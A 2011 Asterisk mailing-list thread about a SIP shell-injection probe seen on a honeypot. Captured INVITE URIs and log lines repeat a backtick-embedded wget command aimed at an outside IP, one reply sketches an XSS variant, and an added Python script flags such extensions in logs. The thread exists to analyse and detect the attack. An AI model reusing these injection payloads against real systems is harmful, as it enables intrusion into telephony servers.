Tom Browning
2011-Sep-11 23:05 UTC
[asterisk-users] new sort of shell attack attempt via SIP?
I haven't seen this sort of URI/shell attack prior to today but it looks interesting. Embedding a backtick in the URI with a wget that doesn't seem to do much to an empty file. I'm guessing it is just a probe to see if they can send further embedded backtick shell commands to my Asterisk instance (by watching their weblogs @ 91.223.89.94). (This happens to be my "honeypot" that just accepts all calls and dumps them into one big Asterisk 10 beta ConfBridge :-)

INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0

Does Asterisk have a shell injection weakness? Or perhaps this targets some other Asterisk config manager that is subject to injection via URI?

Tom
Alex Balashov
2011-Sep-11 23:20 UTC
[asterisk-users] new sort of shell attack attempt via SIP?
On 09/11/2011 07:05 PM, Tom Browning wrote:
> INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
> SIP/2.0

My guess is that this attack presumes you are running a web GUI such as FreePBX, and that it does not sanitise embedded HTML. Thus, when reviewing your CDRs, for instance, you might click on such a link. A more sophisticated variant of that would embed <script> tags with a shortened URL (overall small enough to fit inside a SIP display name field or whatnot) to effectuate a cross-site scripting attack.

-- 
Alex Balashov - Principal
Evariste Systems LLC
260 Peachtree Street NW
Suite 2200
Atlanta, GA 30303
Tel: +1-678-954-0670
Fax: +1-404-961-1892
Web: http://www.evaristesys.com/
Saqib Butt
2011-Sep-12 21:02 UTC
[asterisk-users] new sort of shell attack attempt via SIP?
I have seen this recently in my logs as well:

[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp("SIP/5060-0000002c", "Received incoming SIP connection from unknown peer to 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:2] Set("SIP/5060-0000002c", "DID=00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:3] Goto("SIP/5060-0000002c", "s,1") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,s,1)
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s at from-sip-external:1] GotoIf("SIP/5060-0000002c", "0?from-trunk,00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`,1") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,//91.223.89.94/V.php`,1)

So can this be blocked via fail2ban and by adding a new REGEX?

Thanks
Saqib
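As an added illustration of the detection Saqib is asking about (not code from the thread or from Asterisk), the script below scans Asterisk verbose log lines for dialled extensions that contain shell metacharacters or \xNN escapes, as in the entries quoted above, and decodes the escapes so the probe reads as the attacker typed it. The sample lines are constructed to mirror the quoted log; note that these "Executing" lines carry no source address, so pairing a hit with a peer IP for fail2ban would need the log line that records it.

```python
import re

# Constructed sample lines modelled on the Asterisk verbose log quoted in the thread.
SAMPLE_LOG = r"""[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp("SIP/5060-0000002c", "Received incoming SIP connection from unknown peer") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s@from-sip-external:1] GotoIf("SIP/5060-0000002c", "0?from-trunk,s,1") in new stack
[2011-09-10 20:35:01] VERBOSE[14939] logger.c: -- Executing [2125551234@from-sip-external:1] NoOp("SIP/5060-0000002d", "normal call") in new stack
"""

# Extension, context and priority of an "Executing [ext@context:prio] App(" line.
# The extension is everything before the last '@', since an injected URI may itself
# contain '@' or ':' characters.
EXEC_RE = re.compile(
    r'Executing \[(?P<ext>.+)@(?P<ctx>[^@\]:]+):(?P<prio>\d+)\] (?P<app>\w+)\('
)

# Characters that do not belong in a dialled number or SIP user part but are meaningful
# to a shell (backticks, $(...), pipes, semicolons, redirections), plus \xNN escapes,
# which Asterisk uses to log characters it considers unprintable.
SHELL_META_RE = re.compile(r'[`$;|&<>]|\\x[0-9a-fA-F]{2}')


def decode_escapes(s):
    """Turn Asterisk's \\xNN escapes (e.g. \\x20 for a space) back into characters."""
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)


def find_suspicious_extensions(log_text):
    """Return (extension, context, decoded_extension) for every Executing line whose
    extension contains shell metacharacters or \\xNN escapes. Repeated hits for the
    same extension and context (one per dialplan priority) are reported once."""
    hits = []
    seen = set()
    for line in log_text.splitlines():
        m = EXEC_RE.search(line)
        if not m:
            continue
        ext, ctx = m.group('ext'), m.group('ctx')
        if SHELL_META_RE.search(ext) and (ext, ctx) not in seen:
            seen.add((ext, ctx))
            hits.append((ext, ctx, decode_escapes(ext)))
    return hits


if __name__ == '__main__':
    for ext, ctx, decoded in find_suspicious_extensions(SAMPLE_LOG):
        print('suspicious extension in context %s: %s' % (ctx, decoded))
```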